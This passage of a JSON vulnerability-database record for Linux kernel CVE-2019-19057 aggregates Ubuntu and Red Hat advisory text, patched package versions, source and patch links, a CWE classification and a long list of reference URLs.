was discovered that the AMD GPU device drivers in the Linux kernel did\nnot properly deallocate memory in certain error conditions. (CVE-2019-19082)\n\nDan Carpenter discovered that the AppleTalk networking subsystem of the\nLinux kernel did not properly handle certain error conditions, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2019-19227)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly handle ioctl requests to get emulated CPUID\nfeatures. An attacker with access to /dev/kvm could use this to cause a\ndenial of service (system crash). (CVE-2019-19332)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle certain conditions. An attacker could use\nthis to specially craft an ext4 file system that, when mounted, could cause\na denial of service (system crash) or possibly execute arbitrary code. \n(CVE-2019-19767)\n\nGao Chuan discovered that the SAS Class driver in the Linux kernel\ncontained a race condition that could lead to a NULL pointer dereference. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-19965)\n\nIt was discovered that the Datagram Congestion Control Protocol (DCCP)\nimplementation in the Linux kernel did not properly deallocate memory in\ncertain error conditions. (CVE-2019-20096)\n\nMitchell Frank discovered that the Wi-Fi implementation in the Linux kernel\nwhen used as an access point would send IAPP location updates for stations\nbefore client authentication had completed. A physically proximate attacker\ncould use this to cause a denial of service. (CVE-2019-5108)\n\nIt was discovered that a race condition can lead to a use-after-free while\ndestroying GEM contexts in the i915 driver for the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-7053)\n\nIt was discovered that the B2C2 FlexCop USB device driver in the Linux\nkernel did not properly validate device metadata. A physically proximate\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-15291)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.15.0-1069-azure   4.15.0-1069.74~14.04.1\n  linux-image-azure               4.15.0.1069.55\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4287-2\n  https://usn.ubuntu.com/4287-1\n  CVE-2019-14615, CVE-2019-15099, CVE-2019-15291, CVE-2019-16229,\n  CVE-2019-16232, CVE-2019-18683, CVE-2019-18786, CVE-2019-18809,\n  CVE-2019-18885, CVE-2019-19057, CVE-2019-19062, CVE-2019-19063,\n  CVE-2019-19071, CVE-2019-19078, CVE-2019-19082, CVE-2019-19227,\n  CVE-2019-19332, CVE-2019-19767, CVE-2019-19965, CVE-2019-20096,\n  CVE-2019-5108, CVE-2020-7053\n\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* RT: update RT source tree to the RHEL-8.2 tree (BZ#1708716)\n\n* KVM-RT guest fails boot with emulatorsched (BZ#1712781)\n\n* 8 vCPU guest need max latency \u003c 20 us with stress [RT-8.2] (BZ#1757165)\n\n* Request nx_huge_pages=N as default value to avoid kvm-rt guest large\nlatency spike [rt-8] (BZ#1788352)\n\n* RT: Add rpm Provide of \u0027kernel\u0027 to indicate that this is a kernel package\n(BZ#1796284)\n\n* [RHEL8] RT kernel signed by test certificate and not Red Hat Secure Boot\n(BZ#1806871)\n\nEnhancement(s):\n\n* update to the upstream 5.x RT patchset (BZ#1680161)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "157422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "157444"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19057",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "155890",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "156427",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "157444",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156124",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0305",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0830",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4584",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4793",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0200",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0572",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1520",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0851",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1480",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0572.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19057",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156110",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156419",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156422",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "157422",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "157422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "157444"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "id": "VAR-201911-1410",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-07-23T19:33:13.621000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=105209"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20201769 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4254-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4254-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0, linux-oracle-5.0 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4285-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-azure vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4287-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure-5.3, linux-gcp, linux-gcp-5.3, linux-hwe, linux-kvm, linux-oracle, linux-raspi2, linux-raspi2-5.3 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4284-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4287-1"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/155890/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4254-1/"
      },
      {
        "trust": 2.2,
        "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4284-1/"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4285-1/"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4254-2/"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4287-2/"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4287-1/"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00029.html"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/d10dcb615c8e29d403a24d35f8310a7a53e3050c"
      },
      {
        "trust": 1.7,
        "url": "https://seclists.org/bugtraq/2020/jan/10"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19057"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3psde6ptotvbk2ytkb2tfqp2subvsnf/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/py7ljmspagrikabjpdkqdtxyw3l5rx2t/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-19057"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3psde6ptotvbk2ytkb2tfqp2subvsnf/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/py7ljmspagrikabjpdkqdtxyw3l5rx2t/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19063"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193200-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4286-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4286-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193381-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200093-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4255-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4253-2/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4258-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4255-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4253-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193316-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156124/ubuntu-security-notice-usn-4254-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156427/ubuntu-security-notice-usn-4287-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4704/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0305/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4793/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0572.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0851/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4584/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0830/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0200/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-kernel-vulnerabilities-7/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0572/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0141/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-kernel-vulnerabilities-6/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1480/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157444/red-hat-security-advisory-2020-1567-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-multiple-vulnerabilities-via-memory-leak-30911"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1520/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19227"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15291"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18683"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19062"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19332"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18885"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15099"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19965"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16229"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18786"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20096"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18809"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5108"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7053"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:1769"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4254-1"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4287-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19078"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19071"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19767"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19082"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15221"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.2_release_notes/index"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19768"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15221"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15090"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-10639"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19073"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19073"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19768"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19074"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8980"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18805"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-1749"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-8980"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19922"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18805"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15099"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16871"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1749"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10639"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19922"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17055"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19074"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19534"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15090"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17053"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19534"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-16871"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/400.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110895"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-173.203"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1128.137"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1101.112"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1132.140"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1065.72"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1025.28"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1011.16"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19947"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4285-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1030.31"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19063"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15291"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19338"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19057"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19227"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19062"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18683"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19338"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1072.79"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1053.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1071.76"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1060.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-88.88~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1033.36~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1052.55"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1055.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1055.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1060.62~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1033.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-88.88"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4287-2"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:1567"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4254-2"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "157422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "157444"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "157422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "157444"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19057"
